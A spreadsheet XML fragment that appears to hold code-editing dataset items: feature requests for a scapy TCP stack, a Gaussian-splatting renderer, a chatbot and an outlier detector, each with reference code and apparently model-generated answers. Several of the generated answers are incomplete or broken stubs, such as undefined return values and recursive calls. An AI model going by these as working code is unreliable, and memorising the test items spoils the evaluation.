 log_entries = listener.get_packet_log()\n    assert len(log_entries) &gt; 0\n    assert log_entries[-1]["direction"] == "outgoing"\n\n#New: Add test for clearing packet logs\ndef test_clear_packet_log():\n    """\n    Test that packet logs can be cleared.\n    """\n    listener = MockListener()\n    conn = TCPSocket(listener)\n    conn.connect("localhost", 80)\n    \n    assert len(listener.get_packet_log()) &gt; 0\n    listener.clear_packet_log()\n    assert len(listener.get_packet_log()) == 0'}</t>
  </si>
  <si>
    <t>{'file_1': 'from scapy.all import sniff, TCP, send, IP\nimport random\nimport threading\nfrom packet_logger import PacketLogger  #Modify\n\nclass TCPListener(object):\n    def __init__(self, ip_address="127.0.0.1"):\n        self.ip_address = ip_address\n        self.source_port = random.randint(12345, 50000)\n        self.open_sockets = {}\n        self.packet_logger = PacketLogger()  #Modify\n        self.start_daemon()\n\n    def dispatch(self, pkt):\n        if not isinstance(pkt.payload.payload, TCP):\n            return\n        ip, port = pkt.payload.dst, pkt.dport\n        if ip != self.ip_address:\n            return\n\n        self.packet_logger.log_packet(pkt)  #Modify\n\n        if (ip, port) not in self.open_sockets:\n            reset = IP(src=ip, dst=pkt.payload.src) / TCP(seq=pkt.ack, sport=port, dport=pkt.sport, flags="R")\n            self.send(reset)\n            return\n        conn = self.open_sockets[ip, port]\n        conn.handle(pkt)\n\n    def send(self, packet, verbose=0):\n        self.packet_logger.log_packet(packet)  #Modify\n        send(packet, verbose=verbose)\n\n    def get_port(self):\n        self.source_port += 1\n        return self.source_port\n\n    def open(self, ip, port, conn):\n        self.open_sockets[ip, port]  = conn\n\n    def close(self, ip, port):\n        del self.open_sockets[ip, port]\n\n    def listen(self):\n        filter_rule = "tcp and ip dst %s" % self.ip_address\n        sniff(filter=filter_rule,  prn=self.dispatch, store=0)\n\n    def start_daemon(self):\n        t = threading.Thread(target=self.listen)\n        t.daemon=True\n        t.start()', 'file_2': 'from teeceepee.tcp import TCPSocket, get_payload\nfrom scapy.all import IP, TCP, Ether, rdpcap, Padding\nfrom mock_listener import MockListener\n\n#Modify for test_syn\ndef test_syn():\n    listener = MockListener()\n    conn = TCPSocket(listener)\n    conn.connect("localhost", 80)\n\n    assert conn.state == "SYN-SENT"\n    pkts = listener.received_packets\n    assert len(pkts) == 1\n    assert pkts[0].sprintf("%TCP.flags%") == "S"\n\n    #New: Verify logging\n    assert len(listener.packet_logger.get_log()) == 1\n    assert listener.packet_logger.get_log()[0] == pkts[0]', 'file_3': 'from teeceepee.tcp import TCPSocket, get_payload\nfrom scapy.all import IP, TCP, Ether, rdpcap, Padding\nfrom mock_listener import MockListener\n\n#Modify for test_handshake_client\ndef test_handshake_client():\n    packet_log = rdpcap("test/inputs/tiniest-session.pcap")\n    listener, conn = create_session(packet_log)\n\n    syn, syn_ack, ack = packet_log[:3]\n    listener.dispatch(syn_ack)\n\n    # Check that they look okay\n    our_syn, our_ack = listener.received_packets\n    our_syn.seq = syn.seq # These aren\'t going to match anyway because reasons\n    check_mostly_same(syn, our_syn)\n    check_mostly_same(ack, our_ack)\n\n    #New: Verify logging\n    log = listener.packet_logger.get_log()\n    assert len(log) == 2\n    assert log[0] == our_syn\n    assert log[1] == our_ack', 'file_4': 'class PacketLogger:\n    def __init__(self):\n        self.log = []\n\n    def log_packet(self, packet):\n        self.log.append(packet)\n\n    def get_log(self):\n        return self.log'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def render_set(model_path, name, iteration, views, gaussians, pipeline, background, optim_pose):\n    render_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "renders")\n    gts_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "gt")\n    refs_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "ref")\n    depth_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "depth")\n\n    makedirs(render_path, exist_ok=True)\n    makedirs(gts_path, exist_ok=True)\n    makedirs(refs_path, exist_ok=True)\n    makedirs(depth_path, exist_ok=True)\n\n    for idx, view in enumerate(tqdm(views, desc="Rendering progress")):\n        if optim_pose:\n            result = render(view, gaussians, pipeline, background)\n            rgb = result["render"]\n            depth = result["depth"]\n        else:\n            rgb, depth = render_with_optim_cam(\n                view, gaussians, pipeline, background)\n        ref = view.original_image[0:3, :, :]\n        gt = view.test_image[0:3, :, :]\n        torchvision.utils.save_image(rgb, os.path.join(\n            render_path, \'{0:05d}\'.format(idx) + ".png"))\n        torchvision.utils.save_image(ref, os.path.join(\n            refs_path, \'{0:05d}\'.format(idx) + ".png"))\n        torchvision.utils.save_image(gt, os.path.join(\n            gts_path, \'{0:05d}\'.format(idx) + ".png"))\n        torchvision.utils.save_image(depth, os.path.join(\n            depth_path, \'{0:05d}\'.format(idx) + ".png"))', 'invoking_code_segment': 'if not skip_train:\n        render_set(dataset.model_path, "train", scene.loaded_iter,\n                   scene.getTrainCameras(), gaussians, pipeline, background, optim_pose)\n\n    if not skip_test:\n        render_set(dataset.model_path, "test", scene.loaded_iter,\n                   scene.getTestCameras(), gaussians, pipeline, background, optim_pose)', 'feature_description': 'Enhance image quality during rendering by adding post-processing filters including bilateral filtering for edge-preserving smoothing, histogram equalization for contrast enhancement, and unsharp masking for sharpness improvement. The enhancement is applied to rendered images before saving.', 'modified_complete_code': '# Modify in render.py - Add imports at the top\nimport torch\nfrom scene import Scene\nimport os\nfrom tqdm import tqdm\nfrom os import makedirs\nfrom gaussian_renderer import render\nimport torchvision\nfrom utils.general_utils import safe_state, visualize_depth\nfrom argparse import ArgumentParser\nfrom arguments import ModelParams, PipelineParams, get_combined_args\nfrom gaussian_renderer import GaussianModel\nfrom utils.loss_utils import l1_loss\nfrom utils.pose_utils import Pose, Lie\nfrom utils.image_utils import psnr\nfrom lpipsPyTorch import lpips\nfrom utils.loss_utils import ssim\nimport sys\n#New\nimport cv2\nimport numpy as np\nfrom torchvision.transforms import GaussianBlur\nimport torch.nn.functional as F\n\n#New\ndef enhance_image_quality(image_tensor, enhancement_type=\'all\'):\n    """\n    Enhance image quality using multiple post-processing techniques.\n    Args:\n        image_tensor: torch tensor of shape (C, H, W) with values in [0, 1]\n        enhancement_type: \'all\', \'bilateral\', \'histogram\', \'unsharp\', or \'denoise\'\n    Returns:\n        Enhanced image tensor\n    """\n    # Convert to numpy for OpenCV processing\n    image_np = (image_tensor.permute(1, 2, 0).cpu().numpy() * 255).astype(np.uint8)\n    \n    if enhancement_type in [\'all\', \'bilateral\']:\n        # Bilateral filtering for edge-preserving smoothing\n        image_np = cv2.bilateralFilter(image_np, 9, 75, 75)\n    \n    if enhancement_type in [\'all\', \'histogram\']:\n        # Histogram equalization for contrast enhancement\n        if len(image_np.shape) == 3:\n            # Convert BGR to HSV for better histogram equalization\n            hsv = cv2.cvtColor(image_np, cv2.COLOR_RGB2HSV)\n            hsv[:, :, 2] = cv2.equalizeHist(hsv[:, :, 2])\n            image_np = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\n    \n    if enhancement_type in [\'all\', \'unsharp\']:\n        # Unsharp masking for sharpness improvement\n        gaussian = cv2.GaussianBlur(image_np, (0, 0), 2.0)\n        image_np = cv2.addWeighted(image_np, 1.5, gaussian, -0.5, 0)\n        image_np = np.clip(image_np, 0, 255).astype(np.uint8)\n    \n    if enhancement_type in [\'all\', \'denoise\']:\n        # Non-local means denoising\n        image_np = cv2.fastNlMeansDenoisingColored(image_np, None, h=10, hForColorComponents=10, templateWindowSize=7, searchWindowSize=21)\n    \n    # Convert back to tensor\n    enhanced_tensor = torch.from_numpy(image_np.astype(np.float32) / 255.0).permute(2, 0, 1).cuda()\n    return enhanced_tensor\n\ndef render_with_optim_cam(view, gaussians, pipeline, background):\n    gt_image = view.test_image.cuda()\n    pose = torch.nn.Parameter(\n        (torch.zeros_like(view.gaussian_trans)).cuda().requires_grad_(True))\n    optimizer = torch.optim.Adam([{\'params\': [pose],\n                                  \'lr\': 1e-3, "name": "camera pose refine"}])\n    for iter in range(1400):\n        # view.pose = Pose().compose([Lie().se3_to_SE3(pose), view.pose_gt])\n        view.gaussian_trans = pose\n        image = render(view, gaussians, pipeline, background)["render"]\n        loss = l1_loss(image, gt_image)\n        loss.backward()\n        optimizer.step()\n        optimizer.zero_grad(set_to_none=True)\n        print(\n            f"{iter} loss={loss:03f}", end=\'\\r\')\n\n    view.gaussian_trans = pose\n    # view.pose = Pose().compose(Lie().se3_to_SE3(pose), view.pose_gt)\n    result = render(view, gaussians, pipeline, background)\n    rgb = result["render"]\n    depth = result["depth"]\n    print(f"\\n")\n    print(f"psnr={psnr(rgb, gt_image).mean().double()}")\n    print(f"ssim={ssim(rgb, gt_image).mean().double()}")\n    print(f"lpips={lpips(rgb, gt_image).mean().double()}")\n    return rgb, visualize_depth(depth)\n\n#Modify\ndef render_set(model_path, name, iteration, views, gaussians, pipeline, background, optim_pose, enable_enhancement=True):\n    render_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "renders")\n    gts_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "gt")\n    refs_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "ref")\n    depth_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "depth")\n    #New\n    enhanced_path = os.path.join(\n        model_path, name, "ours_{}".format(iteration), "enhanced")\n\n    makedirs(render_path, exist_ok=True)\n    makedirs(gts_path, exist_ok=True)\n    makedirs(refs_path, exist_ok=True)\n    makedirs(depth_path, exist_ok=True)\n    #New\n    makedirs(enhanced_path, exist_ok=True)\n\n    for idx, view in enumerate(tqdm(views, desc="Rendering progress")):\n        if optim_pose:\n            result = render(view, gaussians, pipeline, background)\n            rgb = result["render"]\n            depth = result["depth"]\n        else:\n            rgb, depth = render_with_optim_cam(\n                view, gaussians, pipeline, background)\n        \n        #New\n        # Apply image quality enhancement\n        if enable_enhancement:\n            rgb_enhanced = enhance_image_quality(rgb, enhancement_type=\'all\')\n        else:\n            rgb_enhanced = rgb\n        \n        ref = view.original_image[0:3, :, :]\n        gt = view.test_image[0:3, :, :]\n        torchvision.utils.save_image(rgb, os.path.join(\n            render_path, \'{0:05d}\'.format(idx) + ".png"))\n        torchvision.utils.save_image(ref, os.path.join(\n            refs_path, \'{0:05d}\'.format(idx) + ".png"))\n        torchvision.utils.save_image(gt, os.path.join(\n            gts_path, \'{0:05d}\'.format(idx) + ".png"))\n        torchvision.utils.save_image(depth, os.path.join(\n            depth_path, \'{0:05d}\'.format(idx) + ".png"))\n        #New\n        torchvision.utils.save_image(rgb_enhanced, os.path.join(\n            enhanced_path, \'{0:05d}\'.format(idx) + ".png"))\n\n#Modify\ndef render_sets(dataset: ModelParams, iteration: int, pipeline: PipelineParams, skip_train: bool, skip_test: bool, optim_pose: bool, enable_enhancement: bool = True):\n    # with True:\n    # with torch.no_grad():\n    gaussians = GaussianModel(dataset.sh_degree)\n    scene = Scene(dataset, gaussians,\n                  load_iteration=iteration, shuffle=False)\n\n    bg_color = [1, 1, 1] if dataset.white_background else [0, 0, 0]\n    background = torch.tensor(bg_color, dtype=torch.float32, device="cuda")\n\n    if not skip_train:\n        #Modify\n        render_set(dataset.model_path, "train", scene.loaded_iter,\n                   scene.getTrainCameras(), gaussians, pipeline, background, optim_pose, enable_enhancement)\n\n    if not skip_test:\n        #Modify\n        render_set(dataset.model_path, "test", scene.loaded_iter,\n                   scene.getTestCameras(), gaussians, pipeline, background, optim_pose, enable_enhancement)\n\nif __name__ == "__main__":\n    # Set up command line argument parser\n    parser = ArgumentParser(description="Testing script parameters")\n    model = ModelParams(parser, sentinel=True)\n    pipeline = PipelineParams(parser)\n    parser.add_argument("--iteration", default=-1, type=int)\n    parser.add_argument("--skip_train", action="store_true")\n    parser.add_argument("--skip_test", action="store_true")\n    parser.add_argument("--optim_pose", action="store_false")\n    parser.add_argument("--quiet", action="store_true")\n    parser.add_argument("--device", type=str, default="cuda:0")\n    #New\n    parser.add_argument("--enable_enhancement", action="store_true", default=True)\n    args = get_combined_args(parser)\n    print("Rendering " + args.model_path)\n\n    # Initialize system state (RNG)\n    safe_state(args.quiet, args.device)\n\n    #Modify\n    render_sets(model.extract(args), args.iteration,\n                pipeline.extract(args), args.skip_train, args.skip_test, args.optim_pose, args.enable_enhancement)'}</t>
  </si>
  <si>
    <t>{'file_1': 'def render(view, gaussians, pipeline, background):\n    # Modify for modified parts\n    result = original_render_function(view, gaussians, pipeline, background)\n    enhanced_rgb = new_feature_function(view, gaussians, pipeline, background)\n    return {"render": enhanced_rgb, "depth": result["depth"]}', 'file_2': 'def render_set(model_path, name, iteration, views, gaussians, pipeline, background, optim_pose):\n    # Render set function implementation\n    for idx, view in enumerate(tqdm(views, desc="Rendering progress")):\n        if optim_pose:\n            result = render(view, gaussians, pipeline, background)\n            rgb = result["render"]\n            depth = result["depth"]\n        else:\n            rgb, depth = render_with_optim_cam(view, gaussians, pipeline, background)\n        # Save images and depth', 'file_3': 'def render_sets(dataset: ModelParams, iteration: int, pipeline: PipelineParams, skip_train: bool, skip_test: bool, optim_pose: bool):\n    # Render sets function implementation\n    gaussians = GaussianModel(dataset.sh_degree)\n    scene = Scene(dataset, gaussians, load_iteration=iteration, shuffle=False)\n    if not skip_train:\n        render_set(dataset.model_path, "train", scene.loaded_iter, scene.getTrainCameras(), gaussians, pipeline, background, optim_pose)\n    if not skip_test:\n        render_set(dataset.model_path, "test", scene.loaded_iter, scene.getTestCameras(), gaussians, pipeline, background, optim_pose)', 'file_4': 'def new_feature_function(view, gaussians, pipeline, background):\n    # New feature implementation\n    result = render(view, gaussians, pipeline, background)\n    enhanced_rgb = enhance_image(result["render"])\n    return enhanced_rgb\n\ndef enhance_image(image):\n    # Image enhancement logic\n    # Example: Apply a sharpening filter\n    return sharpened_image'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def predict(self, session_id, question):\n    chat_session = self.session_data.get_session(session_id)\n    chat_session.before_prediction()\n    if question.strip() == \'\':\n        answer = "Don\'t you want to say something to me?"\n        chat_session.after_prediction(question, answer)\n        return answer\n    pat_matched, new_sentence, para_list = check_patterns_and_replace(question)', 'invoking_code_segment': 'def reply(self, sessionId, question):\n    if sessionId not in predictor.session_data.session_dict:\n        sessionId = self.predictor.session_data.add_session()\n    answer = self.predictor.predict(sessionId, question)\n    outputSentence = SessionSentence()\n    outputSentence.sessionId = sessionId\n    outputSentence.sentence = answer\n    return outputSentence', 'feature_description': 'Add a new feature to modify the input question before processing by introducing a question preprocessing method that can be called before the main prediction logic. This allows for custom question transformation such as removing extra whitespace, normalizing punctuation, or applying domain-specific text cleaning.', 'modified_complete_code': '# File 1: ChatLearner/chatbot/botpredictor.py\n# Modified predict method with preprocessing feature\n\nclass BotPredictor(object):\n    # ... existing code ...\n    \n    #New\n    def preprocess_question(self, question):\n        """\n        Preprocess the input question before prediction.\n        This method can be extended to apply custom transformations.\n        \n        Args:\n            question: The raw input question string.\n            \n        Returns:\n            The preprocessed question string.\n        """\n        # Remove leading/trailing whitespace\n        question = question.strip()\n        # Normalize multiple spaces to single space\n        question = \' \'.join(question.split())\n        return question\n    \n    #Modify\n    def predict(self, session_id, question):\n        chat_session = self.session_data.get_session(session_id)\n        chat_session.before_prediction()  # Reset before each prediction\n        \n        #New - Preprocess the question\n        question = self.preprocess_question(question)\n\n        if question.strip() == \'\':\n            answer = "Don\'t you want to say something to me?"\n            chat_session.after_prediction(question, answer)\n            return answer\n\n        pat_matched, new_sentence, para_list = check_patterns_and_replace(question)\n        # ... rest of the method remains the same ...\n\n# File 2: ChatLearner/webui/server/chatservice.py\n# Modified reply method to utilize preprocessing\n\nclass ChatService(soaphandler.SoapHandler):\n    def initialize(self, **kwargs):\n        self.predictor = kwargs.pop(\'predictor\')\n\n    @webservice(_params=[xmltypes.Integer, xmltypes.String], _returns=SessionSentence)\n    #Modify\n    def reply(self, sessionId, question):\n        """\n        Args:\n            sessionId: ID of the chat session. \n            question: The sentence given by the end user who chats with the ChatLearner. \n        Returns:\n            outputSentence: The sessionId is the same as in the input for validation purpose. \n            The answer is the response from the ChatLearner.\n        """\n        #New - Preprocess question before validation\n        question = self.predictor.preprocess_question(question)\n        \n        if sessionId not in self.predictor.session_data.session_dict:  # Including the case of 0\n            sessionId = self.predictor.session_data.add_session()\n\n        answer = self.predictor.predict(sessionId, question)\n\n        outputSentence = SessionSentence()\n        outputSentence.sessionId = sessionId\n        outputSentence.sentence = answer\n        return outputSentence'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def predict(self, session_id, question):\n    chat_session = self.session_data.get_session(session_id)\n    chat_session.before_prediction()  # Reset before each prediction\n\n    if question.strip() == \'\':\n        answer = "Don\'t you want to say something to me?"\n        chat_session.after_prediction(question, answer)\n        return answer\n\n    #Modify: Call the new feature function to modify the question\n    question = new_feature_function(session_id, question)\n\n    pat_matched, new_sentence, para_list = check_patterns_and_replace(question)\n\n    for pre_time in range(2):\n        tokens = nltk.word_tokenize(new_sentence.lower())\n        tmp_sentence = [\' \'.join(tokens[:]).strip()]\n\n        self.session.run(self.infer_batch.initializer,\n                         feed_dict={self.src_placeholder: tmp_sentence})\n\n        outputs, _ = self.model.infer(self.session)\n\n        if self.hparams.beam_width &gt; 0:\n            outputs = outputs[0]\n\n        eos_token = self.hparams.eos_token.encode("utf-8")\n        outputs = outputs.tolist()[0]\n\n        if eos_token in outputs:\n            outputs = outputs[:outputs.index(eos_token)]\n\n        if pat_matched and pre_time == 0:\n            out_sentence, if_func_val = self._get_final_output(outputs, chat_session,\n                                                               para_list=para_list)\n            if if_func_val:\n                chat_session.after_prediction(question, out_sentence)\n                return out_sentence\n            else:\n                new_sentence = question\n        else:\n            out_sentence, _ = self._get_final_output(outputs, chat_session)\n            chat_session.after_prediction(question, out_sentence)\n            return out_sentence', '#file 2': '@webservice(_params=[xmltypes.Integer, xmltypes.String], _returns=SessionSentence)\n    def reply(self, sessionId, question):\n        """\n        Args:\n            sessionId: ID of the chat session. \n            question: The sentence given by the end user who chats with the ChatLearner. \n        Returns:\n            outputSentence: The sessionId is the same as in the input for validation purpose. \n            The answer is the response from the ChatLearner.\n        """\n        if sessionId not in predictor.session_data.session_dict:  # Including the case of 0\n            sessionId = self.predictor.session_data.add_session()\n\n        answer = self.predictor.predict(sessionId, question)\n\n        outputSentence = SessionSentence()\n        outputSentence.sessionId = sessionId\n        outputSentence.sentence = answer\n        return outputSentence', '#file 3': 'N/A', '#file 4': 'def new_feature_function(session_id, question):\n    # New feature implementation\n    # This function will be called from the predict method in BotPredictor\n    # It will perform additional processing on the question and return a modified question\n    modified_question = question.upper()  # Example modification\n    return modified_question'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'detect() function in AutoOut/app/outlier_treatment/main.py', 'invoking_code_segment': 'detect_all() function in AutoOut/app/outlier_treatment/main.py and detect_outliers() view in AutoOut/app/views.py', 'feature_description': "Add a new custom outlier detection algorithm called 'CustomAlgorithm' that can be used alongside existing detection methods. This feature allows users to implement their own detection logic by extending a base CustomDetector class and registering it in the OUTLIER_SPACES configuration.", 'modified_complete_code': '# File 1: AutoOut/app/outlier_treatment/main.py\n\n# #New - Add custom detector base class\nclass CustomDetector(object):\n    """Base class for custom outlier detection algorithms"""\n    def __init__(self, **params):\n        self.params = params\n    \n    def fit_predict(self, X):\n        raise NotImplementedError("Subclasses must implement fit_predict method")\n\n# #New - Example custom algorithm implementation\nclass CustomAlgorithm(CustomDetector):\n    """Custom outlier detection algorithm using statistical methods"""\n    def __init__(self, sensitivity=0.95, **params):\n        super().__init__(**params)\n        self.sensitivity = sensitivity\n        self.y_predicted = []\n    \n    def fit_predict(self, X):\n        # Custom algorithm: detect outliers using quantile-based approach\n        X_array = np.array(X)\n        lower_quantile = np.quantile(X_array, 1 - self.sensitivity, axis=0)\n        upper_quantile = np.quantile(X_array, self.sensitivity, axis=0)\n        \n        outliers = []\n        for i in range(X_array.shape[0]):\n            is_outlier = np.any((X_array[i] &lt; lower_quantile) | (X_array[i] &gt; upper_quantile))\n            outliers.append(1 if is_outlier else 0)\n        \n        self.y_predicted = outliers\n        return outliers\n\n# #Modify - Updated detect function to support custom algorithms\ndef detect(file_path, space, deleted_features):\n    """\n    Detect outliers\n    """\n    start_time = time.time()\n    print("==================================================")\n    print("Outlier detection and treatment started ...")\n    print("Space:", space)\n\n    X = DataLoader.load(file_path)\n\n    if len(deleted_features) &gt; 0:\n        X = X.drop(deleted_features, axis=1, inplace=False)\n\n    # Basic data cleaning\n    X = data_cleaning_formatting(X)\n\n    y_predicted = None\n    params = space[\'params\']\n    error = dict()\n\n    try:\n        if space[\'model\'] == "DBSCAN":\n            model = DBSCAN(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x &lt; 0 else 0, y_predicted))\n\n        elif space[\'model\'] == "OPTICS":\n            model = OPTICS(**params)\n            y_predicted = model.fit_predict(X)\n            print(y_predicted)\n            y_predicted = list(map(lambda x: 1 if x &lt; 0 else 0, y_predicted))\n\n        elif space[\'model\'] == "EllipticEnvelope":\n            model = EllipticEnvelope(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "IsolationForest":\n            model = IsolationForest(**params)\n            with parallel_backend(\'threading\'):\n                y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "OneClassSVM":\n            model = OneClassSVM(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "LocalOutlierFactor":\n            model = LocalOutlierFactor(**params)\n            with parallel_backend(\'threading\'):\n                y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "zscore":\n            model = ZScore(threshold=params[\'threshold\'])\n            y_predicted = model.fit_predict(X)\n        \n        # #New - Support for custom algorithms\n        elif space[\'model\'] == "CustomAlgorithm":\n            model = CustomAlgorithm(**params)\n            y_predicted = model.fit_predict(X)\n        \n        # #New - Generic custom detector support\n        elif space[\'model\'].startswith("Custom"):\n            custom_class = globals().get(space[\'model\'])\n            if custom_class and issubclass(custom_class, CustomDetector):\n                model = custom_class(**params)\n                y_predicted = model.fit_predict(X)\n            else:\n                raise ValueError(f"Custom algorithm {space[\'model\']} not found")\n\n    except Exception as e:\n        print("Error:", e)\n        y_predicted = [0] * X.shape[0]\n        error[\'detect_\' + str(space)] = e\n\n    if isinstance(y_predicted, list):\n        y_predicted = np.array(y_predicted)\n\n    time_taken = time.time() - start_time\n    print("Time taken:", time_taken)\n\n    return y_predicted\n\n# File 2: AutoOut/app/views.py\n\n# #Modify - Updated detect_outliers view to support custom algorithms\n@csrf_exempt\ndef detect_outliers(request):\n    """\n    Detect outliers end point\n    """\n    dataset_id = int(request.GET.get("dataset_id"))\n    # #New - Optional parameter to specify custom algorithm\n    custom_algorithm = request.GET.get("custom_algorithm", None)\n\n    if dataset_id is None:\n        return JsonResponse({"status": "failure", "message": "Dataset id is not provided"})\n\n    dataset = Dataset.objects.get(pk=dataset_id)\n    file_path = dataset.path\n    delete_features = json.loads(dataset.deleted_features)\n\n    # Create a detection experiment and start outlier detection\n    process = Process.objects.get(name=\'Detection\')\n    process_status = ProcessStatus.objects.get(name=\'Running\')\n    experiment = Experiment(dataset=dataset, process=process, process_status=process_status)\n    experiment.save()\n    results = delayed(detect_all)(os.path.join(settings.MEDIA_ROOT, file_path), experiment.id, settings.RESULTS_ROOT,\n                                  delete_features, custom_algorithm)\n    dask.compute(results)\n\n    return JsonResponse(\n        {\'status\': \'success\', \'message\': \'Detection started successfully\', \'experiment_id\': experiment.id})\n\n# #Modify - Updated detect_all function signature to accept custom algorithm parameter\ndef detect_all(file_path, experiment_id, results_path, deleted_features, custom_algorithm=None):\n    if file_path is None:\n        raise Exception("File path is null")\n\n    try:\n        delayed_list = []\n        spaces_to_use = OUTLIER_SPACES\n        \n        # #New - Add custom algorithm to spaces if specified\n        if custom_algorithm:\n            custom_space = {"model": custom_algorithm, "params": {}}\n            spaces_to_use = list(OUTLIER_SPACES) + [custom_space]\n        \n        for _, space in enumerate(spaces_to_use):\n            delayed_list.append(delayed(detect)(file_path, space, deleted_features))\n\n        results = dask.compute(*delayed_list)\n        results = [(r.tolist()) for r in list(results)]\n        final_results = dict(zip(range(len(list(results))), results))\n\n        # Store final results\n        if not os.path.exists(results_path):\n            os.makedirs(results_path)\n\n        file_name = \'detection_results_{}.json\'.format(experiment_id)\n        results_file_path = os.path.join(results_path, file_name)\n\n        with open(results_file_path, "w") as fp:\n            json.dump(final_results, fp)\n\n        # Update server\n        data = {\'experiment_id\': experiment_id,\n                \'results_file_path\': file_name,\n                "process_status_id": 3}\n        update_server(data)\n    except Exception as e:\n        print("Error:", e)\n        data = {\'experiment_id\': experiment_id,\n                "process_status_id": 4}\n        update_server(data)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def detect(file_path, space, deleted_features):\n    start_time = time.time()\n    print("==================================================")\n    print("Outlier detection and treatment started ...")\n    print("Space:", space)\n\n    X = DataLoader.load(file_path)\n    if len(deleted_features) &gt; 0:\n        X = X.drop(deleted_features, axis=1, inplace=False)\n\n    X = data_cleaning_formatting(X)\n\n    y_predicted = None\n    params = space[\'params\']\n    error = dict()\n\n    try:\n        if space[\'model\'] == "DBSCAN":\n            model = DBSCAN(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x &lt; 0 else 0, y_predicted))\n\n        elif space[\'model\'] == "OPTICS":\n            model = OPTICS(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x &lt; 0 else 0, y_predicted))\n\n        elif space[\'model\'] == "EllipticEnvelope":\n            model = EllipticEnvelope(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "IsolationForest":\n            model = IsolationForest(**params)\n            with parallel_backend(\'threading\'):\n                y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "OneClassSVM":\n            model = OneClassSVM(**params)\n            y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "LocalOutlierFactor":\n            model = LocalOutlierFactor(**params)\n            with parallel_backend(\'threading\'):\n                y_predicted = model.fit_predict(X)\n            y_predicted = list(map(lambda x: 1 if x == -1 else 0, y_predicted))\n\n        elif space[\'model\'] == "zscore":\n            model = ZScore(threshold=params[\'threshold\'])\n            y_predicted = model.fit_predict(X)\n\n        #Modify\n        elif space[\'model\'] == "custom_model":\n            y_predicted = new_feature_function(file_path, space, deleted_features)\n\n    except Exception as e:\n        print("Error:", e)\n        y_predicted = [0] * X.shape[0]\n        error[\'detect_\' + str(space)] = e\n\n    if isinstance(y_predicted, list):\n        y_predicted = np.array(y_predicted)\n\n    time_taken = time.time() - start_time\n    print("Time taken:", time_taken)\n\n    return y_predicted', '#file 2': 'def detect_all(file_path, experiment_id, results_path, deleted_features):\n    if file_path is None:\n        raise Exception("File path is null")\n\n    try:\n        delayed_list = []\n        for _, space in enumerate(OUTLIER_SPACES):\n            delayed_list.append(delayed(detect)(file_path, space, deleted_features))\n\n        results = dask.compute(*delayed_list)\n        results = [(r.tolist()) for r in list(results)]\n        final_results = dict(zip(range(len(list(results))), results))\n\n        if not os.path.exists(results_path):\n            os.makedirs(results_path)\n\n        file_name = \'detection_results_{}.json\'.format(experiment_id)\n        results_file_path = os.path.join(results_path, file_name)\n\n        with open(results_file_path, "w") as fp:\n            json.dump(final_results, fp)\n\n        data = {\'experiment_id\': experiment_id,\n                \'results_file_path\': file_name,\n                "process_status_id": 3}\n        update_server(data)\n    except Exception as e:\n        print("Error:", e)\n        data = {\'experiment_id\': experiment_id,\n                "process_status_id": 4}\n        update_server(data)', '#file 3': 'def detect_outliers(request):\n    dataset_id = int(request.GET.get("dataset_id"))\n\n    if dataset_id is None:\n        return JsonResponse({"status": "failure", "message": "Dataset id is not provided"})\n\n    dataset = Dataset.objects.get(pk=dataset_id)\n    file_path = dataset.path\n    delete_features = json.loads(dataset.deleted_features)\n\n    process = Process.objects.get(name=\'Detection\')\n    process_status = ProcessStatus.objects.get(name=\'Running\')\n    experiment = Experiment(dataset=dataset, process=process, process_status=process_status)\n    experiment.save()\n    results = delayed(detect_all)(os.path.join(settings.MEDIA_ROOT, file_path), experiment.id, settings.RESULTS_ROOT, delete_features)\n    dask.compute(results)\n\n    return JsonResponse({\n        \'status\': \'success\',\n        \'message\': \'Detection started successfully\',\n        \'experiment_id\': experiment.id\n    })', '#file 4': 'def new_feature_function(file_path, space, deleted_features):\n    # New feature implementation\n    # This function will be called from #file 1\n    pass'}</t>
  </si>
  <si>
